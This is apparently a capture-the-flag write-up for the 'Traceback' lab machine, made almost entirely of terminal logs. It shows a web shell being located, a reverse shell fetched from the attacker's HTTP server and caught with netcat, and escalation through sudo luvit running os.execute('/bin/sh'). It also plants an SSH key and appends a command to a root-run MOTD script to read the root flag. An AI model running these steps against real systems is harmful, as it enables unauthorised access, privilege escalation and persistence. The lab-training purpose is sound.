Starting from Traceback machine, the flag is dynamic so writeup will public when the machine is retired.
search and make a list best web-shells
gobuster with that list
we found: http://10.10.10.181/smevk.php
make a reverse shell
┌─[parrotvm@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...
10.10.10.181 - - [31/Mar/2020 07:27:01] "GET /php-reverse-shell.php HTTP/1.1" 200 -
wget our shell from cmd in smevk.php shell, then execute it
┌─[✗]─[parrotvm@parrot]─[~/Downloads]
└──╼ $nc -lvp 4444
listening on [any] 4444 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.15.138] from (UNKNOWN) [10.10.10.181] 39530
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:29:55 up 1 min, 0 users, load average: 1.81, 0.70, 0.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ /bin/bash -i
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
webadmin@traceback:/$ cd home/webadmin
cd home/webadmin
webadmin@traceback:/home/webadmin$ ls -al
ls -al
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
webadmin@traceback:/home/webadmin$ echo "os.execute(\"/bin/sh\")" > privesc.lua
<admin$ echo "os.execute(\"/bin/sh\")" > privesc.lua
webadmin@traceback:/home/webadmin$ ls -al
ls -al
total 48
drwxr-x--- 5 webadmin sysadmin 4096 Mar 31 04:30 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
-rw-rw-rw- 1 webadmin webadmin 22 Mar 31 04:30 privesc.lua
webadmin@traceback:/home/webadmin$ chmod +x privesc.lua
webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
<$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
/bin/bash -i
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
sysadmin@traceback:/home/webadmin$ cd ../sysadmin
sysadmin@traceback:~$ ls -al
ls -al
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Mar 31 04:29 user.txt
sysadmin@traceback:~$ wget http://10.10.15.138:1337/id_rsa.pub
wget http://10.10.15.138:1337/id_rsa.pub
--2020-03-31 04:38:05-- http://10.10.15.138:1337/id_rsa.pub
Connecting to 10.10.15.138:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569 [application/octet-stream]
Saving to: 'id_rsa.pub'
0K 100% 140M=0s
2020-03-31 04:38:06 (140 MB/s) - 'id_rsa.pub' saved [569/569]
sysadmin@traceback:~$ ls -al
ls -al
total 4340
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 31 04:38 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rw-r--r-- 1 sysadmin sysadmin 569 Mar 31 04:33 id_rsa.pub
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Mar 31 04:29 user.txt
sysadmin@traceback:~$ cat id_rsa.pub > .ssh/authorized_keys
After go around, Got some hints.........
sysadmin@traceback:/$ locate 00-header
locate 00-header
/etc/update-motd.d/00-header
/var/backups/.update-motd.d/00-header
sysadmin@traceback:/$ ls -al /etc/update-motd.d/
ls -al /etc/update-motd.d/
total 32
drwxr-xr-x 2 root sysadmin 4096 Aug 27 2019 .
drwxr-xr-x 80 root root 4096 Mar 16 03:55 ..
-rwxrwxr-x 1 root sysadmin 981 Mar 31 03:17 00-header
-rwxrwxr-x 1 root sysadmin 982 Mar 31 03:17 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Mar 31 03:17 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Mar 31 03:17 80-esm
-rwxrwxr-x 1 root sysadmin 299 Mar 31 03:17 91-release-upgrade
sysadmin@traceback:/$ ls -al /var/backups/.update-motd.d/
ls -al /var/backups/.update-motd.d/
total 32
drwxr-xr-x 2 root root 4096 Mar 5 02:56 .
drwxr-xr-x 3 root root 4096 Aug 25 2019 ..
-rwxr-xr-x 1 root root 981 Aug 25 2019 00-header
-rwxr-xr-x 1 root root 982 Aug 27 2019 10-help-text
-rwxr-xr-x 1 root root 4264 Aug 25 2019 50-motd-news
-rwxr-xr-x 1 root root 604 Aug 25 2019 80-esm
-rwxr-xr-x 1 root root 299 Aug 25 2019 91-release-upgrade
sysadmin@traceback:/$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
sysadmin@traceback:/etc/update-motd.d$ echo "cat /root/root.txt" >> 00-header
Open new terminal:
┌─[✗]─[parrotvm@parrot]─[~/.ssh]
└──╼ $ssh sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
a0936cc885fef443c1eea92246fc1452
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Mar 31 04:42:58 2020 from 10.10.15.138
$
